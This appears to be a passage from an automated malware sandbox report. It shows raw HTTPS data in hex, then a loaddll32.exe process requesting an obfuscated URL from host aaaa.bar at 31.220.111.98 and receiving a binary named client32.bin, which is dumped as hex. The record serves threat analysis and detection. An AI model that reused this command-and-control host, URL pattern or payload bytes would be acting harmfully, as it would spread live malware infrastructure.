                                                              2021-10-20 13:12:04 UTC306INData Raw: 16 04 3b 3b 83 5a 48 f4 b6 a6 d4 fb 3d 29 fe c2 33 de e5 b2 33 c2 37 d4 e5 94 65 72 83 c2 84 59 e9 4d 55 cf c0 71 95 42 b2 09 27 57 70 1b 29 4a 9b 25 79 fa 14 f8 34 4a 28 af fd c0 0a 76 3d 2f dc cb 57 96 d3 ed df 8c 84 e8 1d c5 80 de f0 53 e0 08 96 90 2b fb b3 89 01 8c fe ba 6b 9a 67 71 00 b5 fc 2a 36 f6 da c3 1f 71 26 a8 a4 a7 99 49 ad 9f 98 07 72 49 d2 42 4f 4b 87 6e fc 54 5a d2 8f 20 8e fd 64 5e a3 fa e8 e8 a4 2e 96 44 4b 9f 5c e0 da 8c 65 de 38 cb 99 b5 c2 61 3c 10 58 fc 70 45 b9 22 4e b7 0c b7 aa 95 18 05 da 73 ba 96 45 67 6f 1f 8f 3f a4 c0 f4 27 8f 3c 74 87 ac 75 a4 60 40 a2 47 b6 95 62 ae 8a 02 b6 4f 82 4b ae e2 3e aa 89 2a 8a 73 f3 50 96 97 34 7c 13 4f 6e 83 a3 fc 70 a0 d7 d6 2c ab 65 52 59 08 89 4f 9a 41 3a 75 93 17 32 49 b9 4b ad 60 1e 6f c0 08
                                                              Data Ascii: ;;ZH=)337erYMUqB'Wp)J%y4J(v=/WS+kgq*6q&IrIBOKnTZ d^.DK\e8a<XpE"NsEgo?'<tu`@GbOK>*sP4|Onp,eRYOA:u2IK`o
                                                              2021-10-20 13:12:04 UTC322INData Raw: 35 08 b5 ae da 8f cc 59 9e dc 22 0e a6 4c b2 72 98 0f 6d 65 74 d3 7d 24 22 13 99 fa c1 82 4f e0 0f cd ac a1 0c eb 6a 9a fd 6f c4 6e 56 c0 81 06 61 a6 82 c8 ba a8 2b d8 91 e3 ac 40 bb 82 67 0b 30 78 21 a1 1a 83 c6 9e 61 35 1d 15 95 b2 cc 31 27 90 11 eb 10 f0 fa f6 33 1b b6 39 49 89 e2 64 a4 95 a1 ac b1 b1 0a 42 b2 10 f8 d8 01 53 9c f7 3c ad 2d 4c 84 3b 72 ce 23 df 17 cf 5e 3e cc b4 61 04 c5 52 ab a7 b2 2b 23 54 1d 1a 01 d4 36 2d 3d ae b0 1e 7b 7a ff 48 9c 28 cc da a6 c0 95 ae 62 af d0 74 b3 cb c6 21 de c0 d7 df bd 9a 7a 14 43 58 00 36 9a 60 23 b8 7c af 09 42 b2 a5 fa d6 c1 6d 92 75 e0 22 a8 96 df b7 e3 7d 27 07 b8 30 01 e4 79 d4 29 b4 86 db 90 69 34 61 8d e2 8c af 36 2d 33 64 ee a8 62 a9 96 05 7b 22 d8 8a 22 1e af 8b d8 6e 6f 6a c3 e8 88 e5 d1 12 3c 6b 99
                                                              Data Ascii: 5Y"Lrmet}$"OjonVa+@g0x!a51'39IdBS<-L;r#^>aR+#T6-={zH(bt!zCX6`#|Bmu"}'0y)i4a6-3db{""noj<k
                                                              2021-10-20 13:12:05 UTC370INData Raw: 98 db 44 22 04 5f f9 61 0b e8 96 dd f6 9f 56 71 ee 85 12 88 33 59 04 2c 7a 79 38 27 5a c9 0a 11 50 86 23 8c ea d2 51 47 b0 2d 2c 9d 92 bf 5a af 82 7d 80 1b 2a 2c cc 4a 09 c6 68 7a 3e f1 5b c9 86 1a e7 c7 75 36 f3 b8 3f e7 a1 99 40 41 1b dd ce ab 2f a1 86 f5 6d cb 2f 68 18 60 2d 77 7b 30 3e f7 16 cb 06 0d ed 04 7c 58 12 ba 32 5b 9c 9a 7f d7 f9 f0 4e 8c 00 db dd 67 2a 90 2f 32 dc 27 d5 61 ce ab bf d6 11 fb ef a4 b2 59 d5 28 f8 cc 9e 5b 36 91 89 3a c4 10 e4 8b 1a 17 a1 ed 0b 5c 99 35 16 ad ed 6f 90 d8 d7 f3 60 b0 68 74 65 75 fd 9e b5 f7 8d 71 5a c7 ed 4f 3e 44 aa de 1f a0 35 1b 8b 00 6b 03 a7 d8 ac 64 af 04 98 af 4a aa 76 d0 90 99 69 1b 71 f1 60 33 4d c3 20 1a b6 a7 46 bb bd 33 07 92 09 47 ae a6 bb 51 19 18 c4 dd e6 5c 04 cf f3 b4 72 34 23 5f 4c 52 b6 30 bd
                                                              Data Ascii: D"_aVq3Y,zy8'ZP#QG-,Z}*,Jhz>[u6?@A/m/h`-w{0>|X2[Ng*/2'aY([6:\5o`hteuqZO>D5kdJviq`3M F3GQ\r4#_LR0
                                                              2021-10-20 13:12:05 UTC386INData Raw: 4c 40 a9 e9 d9 86 bc c0 cd 43 e4 c7 90 ae 8c 19 ac c7 b3 87 5a 51 40 16 7e b8 b0 cc 21 e6 1b 61 46 ef b7 d1 8b 40 f4 fd e2 66 f5 bf 3e 2c 3e a6 4d 92 b5 80 e2 ff 3a 8b 94 a8 8e 69 37 6c 09 2d 6b 7e d6 96 59 40 13 e3 03 18 c6 0f 46 81 3c 73 8e 15 1c 6f 9e d2 53 62 ae a3 d9 7e 7d c3 98 68 9b fd 89 49 70 57 0e eb 52 29 d6 62 e9 f2 1d 7c d2 46 2f a4 96 33 f6 b6 b3 94 d7 30 63 04 db fb 60 4d 2c 82 18 01 17 89 2f 44 0e 4f 7f 5f b2 79 c7 f3 f9 88 ad 5e 15 d3 3f c9 fd 72 fd 77 87 17 60 75 f8 85 83 6b bc 96 51 7a 33 23 e7 bf aa f3 5c 3e cd f2 10 54 d0 c5 f8 aa 0d c9 05 d8 c3 6c ef 6a 00 de 77 81 77 d9 fa d9 93 71 85 14 dc f0 13 ff 87 f6 7f 1d 3c 3d 29 77 97 16 13 13 fa e5 8b e9 c9 c1 ad 5c 0d a5 b7 be 11 a6 85 a8 5b 1b d8 ae e7 85 ff e8 46 47 ed a1 40 b2 bc 1a 82
                                                              Data Ascii: L@CZQ@~!aF@f>,>M:i7l-k~Y@F<soSb~}hIpWR)b|F/30c`M,/DO_y^?rw`ukQz3#\>Tljwwq<=)w\[FG@
                                                              2021-10-20 13:12:05 UTC433INData Raw: fd ae 3e f7 4c 93 cf c5 0c 59 24 59 c9 5d 94 03 66 9e b5 9a 5f 75 2c af 4e ed 4e 44 0d 00 13 2f fe 0e a8 2f ad 23 02 4a 09 d2 90 ad 0f 28 f1 74 3f 9e d9 e5 03 cc 5c 7d 96 be 8b 3a e7 81 2a d0 28 82 9e 72 47 49 ae 68 ab 7e 2b 8c 76 2f ff b3 c4 9b e4 b2 c1 06 5b a1 00 c6 64 27 d0 af 5b e1 4c ed c1 71 6f 5b f5 7b 94 53 8c e5 92 1e b4 2f 7d 8d c5 5a e6 ac 0b 6e f5 0d 40 99 f2 a5 d4 40 d4 71 e9 23 2c 40 bb 6f eb 96 73 0e f9 51 c8 63 9d 33 49 0c 31 7e 88 5c 3e 3c 15 f7 97 48 32 f8 2b e6 fb 88 1a e0 38 e7 13 58 63 9d e7 80 c5 f0 3e ba 91 42 0d 7f cd e9 0d ca e3 e1 81 57 f5 94 7b 71 2f 6d 7c b4 2a f7 6e 85 74 50 94 a5 43 c7 77 00 5e b4 6a c4 a9 37 d4 dc 5f b2 55 b9 d9 f4 e1 81 94 56 02 73 a8 36 b4 9e 4c 53 32 2c 31 20 01 8d c0 58 2a fc df b0 40 cf c3 6e e0 e3 b2
                                                              Data Ascii: >LY$Y]f_u,NND//#J(t?\}:*(rGIh~+v/[d'[Lqo[{S/}Zn@@q#,@osQc3I1~\><H2+8Xc>BW{q/m|*ntPCw^j7_UVs6LS2,1 X*@n
                                                              2021-10-20 13:12:05 UTC449INData Raw: 97 63 78 a6 a0 8e 1a 65 cb 1e 91 2f 22 bb 8a 31 e7 d9 74 a0 06 ab 80 1f 40 e6 3d b2 62 83 57 4a d6 78 d9 76 89 d7 13 5c 17 02 bf c9 86 0b d1 e4 e2 5d c8 32 0f 93 f0 2b c9 3a ef 87 36 a6 3c 40 f3 07 57 c4 30 ac d5 34 fa 5d d1 68 43 c4 2e bf 37 51 69 56 37 74 e2 dd d8 1c c8 ef 82 c0 af 65 b2 ce cf 9b cd 9b 52 a1 f8 80 fe e4 7d a5 36 12 88 cc 61 8a 33 bd 39 e6 58 9f 50 01 1c 4d 01 b4 eb 19 a5 a3 ec 06 45 14 c2 d5 47 4e f9 a8 14 fc a6 64 43 36 fb 29 34 85 de d6 b9 f8 bc 81 aa ee fb 1e e6 d0 7e 0c 8e 4e b9 31 0c 12 af e9 e6 fd 22 d2 c6 50 16 a6 02 1d 7a f6 2b d3 46 07 4f e6 73 ed 53 38 c2 58 45 28 58 3a b1 f6 c3 18 df 96 8a 6f 7e ff 15 c1 12 a6 b6 ac 7f c1 0f ac 94 31 88 b8 1f 5f 74 d9 63 e1 94 11 49 c3 dd 20 d2 c4 78 26 12 f1 60 73 6d 29 bf 09 38 72 79 07 13
                                                              Data Ascii: cxe/"1t@=bWJxv\]2+:6<@W04]hC.7QiV7teR}6a39XPMEGNdC6)4~N1"Pz+FOsS8XE(X:o~1_tcI x&`sm)8ry


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              12192.168.2.54996031.220.111.98443C:\Windows\System32\loaddll32.exe
                                                              TimestampkBytes transferredDirectionData
                                                              2021-10-20 13:12:05 UTC464OUTGET /jdraw/34E0B5g64GhF/3XPDxs0lbMy/bqW9ARMnbt0tkT/D8MYNhHmIu3qZwQWjO72P/RY9TfewXOKIHe_2B/ce4ORl02hRz9Esp/_2BVvpIh9LurZ83S_2/B0O2_2FdR/gIrNQT1mMUiZ_2BS_2BT/MDTnU5RczKhEBmBWqGJ/EyrDp1_2FuqKMBIze3vzAt/t9EP4e8z_2FDf/kKFLZbmvwAVEbK/QjYP.crw HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                              Host: aaaa.bar
                                                              Connection: Keep-Alive
                                                              Cache-Control: no-cache
                                                              Cookie: PHPSESSID=al703vnk3gvkbspp3p283jhcg4; lang=en
                                                              2021-10-20 13:12:06 UTC465INHTTP/1.1 200 OK
                                                              Server: nginx/1.10.3 (Ubuntu)
                                                              Date: Wed, 20 Oct 2021 13:12:05 GMT
                                                              Content-Type: application/zip
                                                              Content-Length: 227913
                                                              Connection: close
                                                              X-Powered-By: PHP/5.4.16
                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                              Cache-Control: public
                                                              Pragma: no-cache
                                                              Content-Transfer-Encoding: Binary
                                                              Content-Disposition: attachment; filename=client32.bin
                                                              2021-10-20 13:12:06 UTC466INData Raw: 7a d8 e7 e8 5a b1 41 33 b2 bc 98 a1 2d 68 13 0f 97 e9 11 38 74 e6 87 20 80 55 24 d2 32 ca b0 b5 fb ef 70 18 d4 d5 42 17 72 8e d5 2f 06 81 8a 8a 11 9a ce 93 c7 7d 46 ec 89 6f b9 08 6e f3 e9 5b bb 4a 79 2d ee 4e f7 bd 61 1f 44 cd 0a f7 36 20 5a 91 04 8e c1 33 8f f7 b1 d2 4e a6 0c 00 cd 68 f5 3a 14 99 e6 2b 34 95 d5 f2 e2 94 d4 0c 25 ae 18 03 78 09 8e f0 c5 6d 1b ab 49 c1 ad 79 81 48 e4 18 22 57 b8 52 0d 2c 28 17 6f a0 8b 55 5f 4b b3 ff 20 9e 5b f8 e2 dd 1a 3f da c4 ce aa 67 12 2e 97 13 2a f0 f8 b1 ff f1 e6 74 f3 a8 1c c9 9e ed 04 cf 21 b7 dc 2c 23 07 33 02 1b f7 d2 cc 06 e3 d7 20 04 e5 45 b7 db 43 76 2e c6 52 d0 4e d3 fe f7 73 59 44 33 b9 94 7e 52 1a 0f 88 95 66 09 0b 79 84 05 4d 1f b8 a4 eb 7b 33 8a 20 c9 4a 1a 36 2a 02 4b 45 ec 8c 07 04 f7 14 d0 74 ce ec
                                                              Data Ascii: zZA3-h8t U$2pBr/}Fon[Jy-NaD6 Z3Nh:+4%xmIyH"WR,(oU_K [?g.*t!,#3 ECv.RNsYD3~RfyM{3 J6*KEt
                                                              2021-10-20 13:12:06 UTC481INData Raw: 2e 4a 31 ca f3 2b be 89 95 34 73 d7 cb 0c 35 50 c4 f1 24 68 8b 88 fc e3 a7 a4 41 86 f8 78 72 ba 2c 90 c1 e3 b3 fd cc d2 05 5c b3 e9 df 42 3a 66 1d 3d 9c 30 db dc 67 7b ab 0a 63 9e 99 3a e3 34 02 9b e3 c3 2a 8e 7b 0a 0e d6 b3 13 54 08 d7 62 5c c8 8a f5 3f 45 1a 48 f9 ef 9c 14 54 a6 b4 3d 2e 56 59 e6 16 5b 29 3c 7b 64 d9 3f 07 fa 80 0a 6a b7 ba 82 65 f6 e2 03 5c 3f 54 5c a2 73 0f 30 1a 81 cf 8b e6 ab e2 01 73 0f 1e 18 75 ad 97 26 cb 15 de 15 d6 48 cb 51 79 8f 3f 63 7b 8f f1 92 43 f0 4f 57 de 6c 4e ad b8 1f f6 47 b9 a2 d8 bc 92 4a 95 19 03 62 3c 8d 67 62 d1 80 db d2 f7 06 37 5c 0f 39 52 04 32 b5 99 20 0e ee 13 87 8f c5 e1 15 23 87 6f d4 a4 3f ae fc ef 14 81 fd fb 27 56 6a a0 df 16 76 77 a2 ca c9 af bc ab 64 2a 89 5d 62 98 bf bb 00 02 3f e2 68 b0 35 6a ef 7e
                                                              Data Ascii: .J1+4s5P$hAxr,\B:f=0g{c:4*{Tb\?EHT=.VY[)<{d?je\?T\s0su&HQy?c{COWlNGJb<gb7\9R2 #o?'Vjvwd*]b?h5j~
                                                              2021-10-20 13:12:06 UTC497INData Raw: 1b c5 c1 52 5d e8 1b 9f 71 ab 0e 0b 8a 06 41 d0 4e b2 cb 38 c5 78 ca 47 e5 5b 37 6b 00 6a a2 3b 43 82 0b 40 3b 9b d6 a7 5c ba 97 be 1f e7 ee af 71 bb 24 48 79 84 77 57 bc ab 4e bb f7 97 e6 e1 0d 53 9e f0 14 bf 31 5d 58 05 68 f2 a0 17 71 1c ad 45 3f ae c8 bc a5 aa 93 eb ba c8 a7 67 ac 5c eb d9 b1 07 eb 5f 17 c0 18 44 0c f2 3d e5 81 b3 8a 93 07 8c a4 fa 37 bc 6f 4c a1 a0 6e 28 50 74 08 0f 4a 51 66 bb b7 f9 2f 6e 3c 71 74 ff d7 8c 9e b5 56 56 9c a7 22 d5 d7 29 76 b5 2e e9 c9 bb bc 74 89 5e 8b 63 a9 b2 5f 63 13 02 9c 34 83 60 13 85 42 2e a4 07 d3 64 e0 bf ec b0 74 b5 5d 30 8f 37 aa b8 eb b6 97 ef d8 c1 41 32 84 02 bf c5 59 16 51 c4 c9 d5 e2 66 32 ef 4b ab 59 9e 90 a0 d8 db c6 fb 78 77 d3 df b2 65 22 a3 66 bb 19 18 43 48 26 2f b4 dc 7b 68 0d 6e 34 d8 2b d0 43
                                                              Data Ascii: R]qAN8xG[7kj;C@;\q$HywWNS1]XhqE?g\_D=7oLn(PtJQf/n<qtVV")v.t^c_c4`B.dt]07A2YQf2KYxwe"fCH&/{hn4+C
                                                              2021-10-20 13:12:06 UTC513INData Raw: 5f 7a 9f 35 09 63 55 53 bb 4b 41 13 f0 91 f8 0a 07 60 7b f7 55 83 b4 a5 17 86 71 27 6b 8d 18 72 f9 43 15 c2 61 8b 60 90 27 e9 c9 13 a2 a0 63 2f 4d 2a 03 5a 41 7f 9f ab 65 f3 69 ce 1b 35 41 db 34 ea eb d6 9d 9f 13 e8 da 77 03 6a d8 e8 da 4f 0b 2b 13 51 a4 96 a7 47 32 59 77 45 0e b9 1f 3f 73 be 78 a0 8b a6 2d 08 2a 52 36 5b 9d ee c1 d3 49 99 23 d5 5b a7 75 83 e2 18 23 e6 f1 ea 0d 54 aa 2d c6 ee 57 34 e5 fb 67 f2 4b 03 93 72 06 90 b3 b6 3e 4b 0d a4 7f 44 69 e4 dc 3f 91 e0 72 6e 51 e4 59 b9 2d 88 6f 71 75 62 c4 aa f8 c6 f9 3f f1 7f cc f0 29 ea 89 7c 41 40 97 26 1c d1 5a 80 46 a4 7e fd 7b 04 0b 75 65 21 25 9a 05 08 e6 80 cc 1a 48 15 cc c7 14 c2 d7 ab bb 00 83 16 00 d3 4e 21 b2 50 29 94 10 54 24 aa c8 23 81 b3 16 c0 fd de fd 17 01 de 7a 04 d1 0f d1 52 69 97 78
                                                              Data Ascii: _z5cUSKA`{Uq'krCa`'c/M*ZAei5A4wjO+QG2YwE?sx-*R6[I#[u#T-W4gKr>KDi?rnQY-oqub?)|A@&ZF~{ue!%HN!P)T$#zRix
                                                              2021-10-20 13:12:06 UTC545INData Raw: f6 dc b3 15 4c d1 14 b8 eb 59 b9 e1 37 08 b7 e2 48 73 d3 5f 58 44 83 57 60 8a b5 ba 46 dd e5 13 b4 4b 9f fa b9 3b 16 57 c6 74 ba b7 ca ae da 55 18 25 a9 61 16 1d 54 de c6 0e 93 ad 72 af 8f 01 7f 9e e5 c2 30 ce 18 65 e9 8d 33 23 21 dd 90 99 be 5a 86 38 60 0a 64 5e c0 3c 9b 98 4a c1 8a ae e6 0b 47 ee 0b ba db c2 e3 cc 1e f2 82 cf 91 7a 59 09 fb 82 ef d3 2c 94 20 0d b3 b6 8e fe fd 12 23 d6 25 d3 1e 4c 5e f8 72 51 3b 5a 5c 95 64 a0 88 22 56 ba 5f d3 14 e8 00 66 ea fb 4f 45 b5 4e 9b 57 cf 89 c4 4e a6 c4 0f dd 04 48 55 f2 4d 05 24 24 c3 51 8a b9 48 c7 c6 d8 f6 c9 af f1 de eb 65 ff 4b 63 c3 ea a4 5d 7b 34 40 46 9d 9a 1f be f2 e5 78 ae 49 25 7f 4a 1c 95 15 02 ba 5f ad 1f 2e 56 d5 e7 19 6f de 86 4e d2 7b 7a de 6d f8 e7 dc 57 f5 23 81 91 3e ab 9d df bf 74 84 26 4b
                                                              Data Ascii: LY7Hs_XDW`FK;WtU%aTr0e3#!Z8`d^<JGzY, #%L^rQ;Z\d"V_fOENWNHUM$$QHeKc]{4@FxI%J_.VoN{zmW#>t&K
                                                              2021-10-20 13:12:07 UTC561INData Raw: 20 bc 07 a2 70 0c ba 65 28 80 61 ab 01 b1 81 37 31 09 a2 a1 66 5c 85 4e 97 ed 5b 95 a8 9f 75 75 3d 68 61 73 f3 9a 62 84 80 1b 83 41 4d a0 6a 3c 97 8b d3 01 45 8e 7d cf 25 76 f8 60 d6 85 04 29 da f2 2a 6a f3 5c 61 19 53 6a e0 54 b4 c8 d0 3d ec b1 f6 a8 41 70 ee a4 81 45 ae cb e4 f8 8e 6b 38 06 eb 05 dd ba 7a af f5 35 93 6b 7d c7 2c 71 20 21 07 81 ac 0b 8d 58 e3 6b 10 c6 50 0f 13 ad a6 a1 48 72 94 7d dd ce 69 16 50 6f 88 bb 55 6f 6c 31 8b ed e7 4b ea a0 cf 38 71 e4 0c f9 89 79 21 01 d8 34 b9 1e 5e 00 38 24 6b ea be e2 59 48 44 b1 52 cd b1 4b f0 70 a9 f8 5e 59 be b8 eb c3 7f 82 9c 9a ff 12 47 93 09 c4 42 ba 07 90 86 13 79 cd e1 4f f3 2c cf e3 13 d4 63 f4 a7 c6 57 a3 a5 9b 80 40 43 ce 8d 9b eb 6e bd f6 db 92 35 b5 45 df 08 5a f2 df 84 f0 c2 9c 93 80 35 01 c8
                                                              Data Ascii: pe(a71f\N[uu=hasbAMj<E}%v`)*j\aSjT=ApEk8z5k},q !XkPHr}iPoUol1K8qy!4^8$kYHDRKp^YGByO,cW@Cn5EZ5
                                                              2021-10-20 13:12:07 UTC577INData Raw: 3b 57 ae 94 64 e1 a2 2f 21 c8 68 fe 83 e9 c0 cc a5 b4 7d ed a7 76 49 ee 30 ac 0d 6b 83 8d 7e 8c ee f8 05 a7 b8 0d 28 e8 9f 3a fb 0b 38 bd fc e6 f8 a1 f9 86 52 ed 92 14 e5 a5 bb 73 24 43 0c 32 6b e9 a3 3e 89 f9 40 7e 69 90 4b b7 6a bf 9b fa 8c e4 ad 3a 20 45 36 5a 03 e0 ff 57 aa de 5d 27 4d 6d f8 a4 95 ae 49 02 c3 28 03 59 cd e3 fc e9 10 ac 2e 39 9c 64 22 3e 5a c2 81 57 11 29 68 0c 61 51 2f dd c5 b5 77 8f 31 ac 3c 48 aa 79 78 74 63 5c da a6 49 bc d2 39 01 f1 0f bb c2 f6 2a 5f 28 b1 0d 45 ca e9 dd 2c 23 c9 61 c2 45 e8 64 1d 29 cb b1 f7 70 c4 6d 0b 74 3d 1a 6f 20 e9 67 f2 6c 6a 67 15 27 d6 86 19 bf d1 31 31 15 ca c2 e1 0d 22 f6 cd 34 a4 87 47 81 23 7c 06 aa db 60 22 7b 5d 59 df 70 e6 8f 80 70 c9 d4 2e 2f 22 98 bb ad 88 cb b3 3b b0 11 09 ab 1a f3 75 16 9d 3b
                                                              Data Ascii: ;Wd/!h}vI0k~(:8Rs$C2k>@~iKj: E6ZW]'MmI(Y.9d">ZW)haQ/w1<Hyxtc\I9*_(E,#aEd)pmt=o gljg'11"4G#|`"{]Ypp./";u;
                                                              2021-10-20 13:12:07 UTC625INData Raw: f4 45 5b 10 5c 2d 4f 1a 90 46 e3 a0 a3 5d 2e e4 27 e6 81 b2 37 f3 fe f5 c0 cb e2 5a 0c 85 c8 56 8d 72 ef 1d 40 1f bd 5e 9f e2 2c 58 0d ce 81 8d 68 22 f1 3e be b1 ce 56 8e 96 ed 7f cb 93 2f c6 da 16 3f 14 29 1e 69 9f ec 31 e0 23 9a 44 94 ef 4b d8 d0 c1 08 99 69 29 c8 2a 18 90 5d 29 c6 d0 cf 66 66 b7 01 05 60 0b 83 1a 6d f9 a0 1d a2 2d 4d a8 5e fc 38 c5 9e 05 82 09 de 00 4f b7 73 ea fb 72 8c cf 67 11 83 58 16 68 e5 c9 91 0f c6 ab 3c ca b1 6f a4 bf 65 e6 a9 54 f6 5c e5 52 58 a3 47 c0 29 a5 02 3c 26 7e 71 87 43 db e8 e3 12 c2 56 f4 e8 c1 a2 78 c5 10 65 40 9f cb f9 f8 c9 72 03 b4 6e 95 83 be c1 6e 77 9d 2a 24 bb 73 49 27 db 0a 07 10 9c 66 19 ba ea 00 22 f3 19 53 e4 a1 e4 9f 83 db a8 a6 ea 07 ec 20 6f 87 4f c8 0a 75 cc cc e6 2d fd 2d de 8a 1a 29 f7 1e 23 9e 84
                                                              Data Ascii: E[\-OF].'7ZVr@^,Xh">V/?)i1#DKi)*])ff`m-M^8OsrgXh<oeT\RXG)<&~qCVxe@rnnw*$sI'f"S oOu--)#
                                                              2021-10-20 13:12:07 UTC657INData Raw: b0 34 69 ae f2 ed 91 62 cf 4c f2 04 e4 81 46 be 40 88 33 ea 12 7f 56 54 38 6e db 40 6d 51 a2 77 ae 02 c6 38 fe 95 2b 17 d7 46 6d 99 c8 3d a7 24 23 10 19 04 2e 3f b8 3d 3c 61 b3 75 82 a1 db 73 32 a3 ba 8c 74 19 28 b4 61 32 ce 18 c2 a7 b8 29 64 f0 59 ea 32 6e 80 1c e4 08 95 08 11 60 54 47 4f 6e a4 5c 7e 63 6d 92 07 c8 8d 02 05 b3 5f 8e 4d dd 31 80 60 af 08 f7 83 2a 1c 25 60 d0 f5 0d dc 79 5d 9d f6 32 fa 40 07 f0 0d a6 f3 a4 7c 6e 95 c0 37 0f b2 f6 fd 4c a0 42 ea 19 f4 58 ae dd 23 9b f7 bb d5 6f 0c 63 d1 92 98 60 b3 c4 66 10 04 d9 51 49 7c 5e 2a 52 89 d4 a2 1a ee db f4 56 d6 53 c7 b3 05 c1 44 71 f4 45 8a b0 67 98 7d 76 d2 c0 e9 48 78 c3 e4 75 71 8b 47 b9 c0 41 8a 1c 15 d7 33 95 c1 46 41 8d 8f bd b8 6b 7c 5d 0b 00 3c fb f4 92 c9 be 97 92 fc 29 98 dc 54 40 51
                                                              Data Ascii: 4ibLF@3VT8n@mQw8+Fm=$#.?=<aus2t(a2)dY2n`TGOn\~cm_M1`*%`y]2@|n7LBX#oc`fQI|^*RVSDqEg}vHxuqGA3FAk|]<)T@Q
                                                              2021-10-20 13:12:07 UTC673INData Raw: a6 7e c3 d7 27 38 80 6d 49 5d ad 80 7b 43 c3 fc 9a 87 9f 53 3a b7 14 15 97 8a 69 87 72 bc 3c a7 88 1e 34 ff 0e d6 ba 8e 0f 5d 42 b0 9a d6 48 bf 3d 19 e5 d6 3e 7b 3b 5f 5e b8 5d 9f a4 ac b0 8e a3 bb e9 89 1e 98 f2 24 ce 4f d6 42 b4 09 c7 14 65 d4 28 df 25 8d fd 27 a5 fc 9a 08 3c 41 73 ca 7e 2c b9 b3 10 20 d0 50 ad 19 1f 23 a0 13 9c 55 b8 30 b4 ed e3 06 18 78 7c 56 12 8e 4d dd 81 ab 9f 21 dc b1 8a 1e aa 8d 1b d5 4b e4 66 9c c8 fc 23 e2 16 65 0f 60 75 d1 21 8f 15 4e 4c 9f ef 63 22 84 4b 27 19 d0 65 1c ff c0 40 8f 76 82 c9 84 e6 0c 61 f7 d3 32 8a 48 e6 f8 d6 8c 63 4a 68 b4 7b 5e bd f8 69 f6 a9 61 13 bf 1a 14 4d 37 04 c2 f8 f3 78 71 1f 87 78 1c ed ae 8f 85 45 7e a4 e4 9f 1d be 25 ea 73 b0 1c 81 9b ee 91 31 b2 97 03 2f 7c b8 3e 09 86 68 f0 fe 0c 26 42 85 4a 1a
                                                              Data Ascii: ~'8mI]{CS:ir<4]BH=>{;_^]$OBe(%'<As~, P#U0x|VM!Kf#e`u!NLc"K'e@va2HcJh{^iaM7xqxE~%s1/|>h&BJ
                                                              2021-10-20 13:12:07 UTC689INData Raw: ad e0 d1 12 29 22 49 f9 a7 34 97 6f 16 37 a2 81 a9 13 85 99 88 2d b8 18 ed ea 94 02 b8 22 70 88 0c 4e 0e 1b 00 37 07 5d 64 37 f1 6a 4c 38 7a f2 3a 1b 46 ef 40 57 8c e1 17 93 3c a3 4b 92 85 6a 10 e7 3f 00 44 98 2b c3 fa ee 7f 6b 37 fb da 91 35 cf 6a 80 66 60 87 9f 24 9d 96 42 04 c0 b3 9a 33 cc 61 ca 16 f3 ed e7 ea a7 3a 20 0f e8 34 ed 80 fe f9 c1 74 5d e2 f9 4a 63 04 d3 49 a0 05 0a f8 4a d1 0a 90 61 6a 78 cd d8 d0 bd e8 5d 41 37 ce 31 6a 1a 93 62 b6 40 78 c3 39 a0 e3 b5 1d 16 c7 a4 52 64 c1 a1 86 59 17 c6 04 73 90 dc 81 c5 b8 85 f8 c8 87 c0 a5 92 a0 ed 29 c2 60 be 4c e0 e9 2e 7b 3f fd 5b 0f a7 d8 d8 2b 82 e3 60 b6 29 35 2b 35 eb de 6d d5 5b 09 af 1e 19 62 3c c6 34 06 bb 37 e1 4c c6 d5 6a 0c e7 7e d4 bc 17 02 40 74 1f 2d 3c fc d2 07 5e 59 fc 92 9e d4 c9 59
                                                              Data Ascii: )"I4o7-"pN7]d7jL8z:F@W<Kj?D+k75jf`$B3a: 4t]JcIJajx]A71jb@x9RdYs)`L.{?[+`)5+5m[b<47Lj~@t-<^YY
                                                              2021-10-20 13:12:07 UTC721INData Raw: 1d 15 22 2b 66 85 73 55 9e f6 5d a8 ee ce a7 ad e3 06 87 85 cc aa 6b f2 42 fd 2e 71 66 12 47 8e 4f 20 98 f2 f2 2f c8 e4 86 04 6d 89 5a 47 41 b4 c5 b3 2c b5 72 11 ed ba 4a 11 d8 c5 78 7a 07 5e 3a 35 5b 79 1b ea f0 cd 1c 51 ca d6 3f 7c 2a 83 33 78 ea f8 a1 d2 53 56 01 d8 bc f0 70 e3 c7 56 d1 49 7c 69 88 45 fd 9e f8 75 51 b3 6b 86 60 ec 24 61 d5 01 53 f6 dd 5f d0 fc 4a c2 a4 a7 9a e1 19 6e 91 30 ef 70 fc 6b 93 3c 90 c8 f6 19 fc a6 ce fc 4e 06 d6 48 8f d3 2d 9d 12 97 9d 2e cb d0 0f ee c6 9c 88 05 10 81 d9 1b 82 d6 24 26 e5 f9 81 16 d7 c4 21 f4 8d 80 59 6e 21 72 a1 30 24 dc 56 eb 1e c2 33 72 fe 43 94 d6 f7 89 b8 f9 c0 bd e3 2a fb 80 da 0f a1 ff 1d 43 89 84 1a b5 ef f5 db bc e9 79 91 d6 80 6d 40 24 9f 96 b2 01 78 4a 45 bf 58 84 4b 5e 45 41 b6 5b 47 0d e4 3b e4
                                                              Data Ascii: "+fsU]kB.qfGO /mZGA,rJxz^:5[yQ?|*3xSVpVI|iEuQk`$aS_Jn0pk<NH-.$&!Yn!r0$V3rC*Cym@$xJEXK^EA[G;
                                                              2021-10-20 13:12:07 UTC737INData Raw: 2e fb d7 0d cb 00 dd e6 64 4f 12 08 ca b5 65 15 ea dd 61 cf 59 a0 04 52 6d 3a 86 4a 5c 6f 3c 6c 28 15 af b6 d0 89 01 51 da 89 16 c7 3c 79 9b 77 68 ca cd 8c 91 5e f7 6f 51 58 f6 11 eb 66 c3 96 07 b5 3c 1f 26 a5 27 0a 26 66 13 20 26 1e ed 1f 1e 48 82 7f 31 c3 3e 11 2e 36 52 61 d9 12 a3 8a 5b d8 ad 2e eb c4 f5 02 a5 f3 57 48 23 3e e2 49 bc 1c 72 e8 1d 42 34 84 0c e4 4b 29 19 0d 98 88 d1 f8 85 30 f5 bc 13 32 3e d8 76 cb 37 60 de ac 31 9d bc c1 16 d8 ea 49 2d d5 70 d8 18 86 1a c3 e6 5c b3 d0 15 54 d4 a9 76 e7 43 90 50 a7 09 85 d6 8b 54 00 3d d6 c1 cd 33 e9 99 9b 62 8d 0b 61 48 63 fd 51 68 59 24 9e e2 b2 37 dd ce 4a 4e ba 5e 02 84 db 7f 49 bd a1 c0 de 66 e3 69 a4 1f 2a 0c 67 99 85 fb 24 98 b2 ab 69 af 8e 8c 62 79 8c 0c 4b d4 5d 7a 2f 03 f4 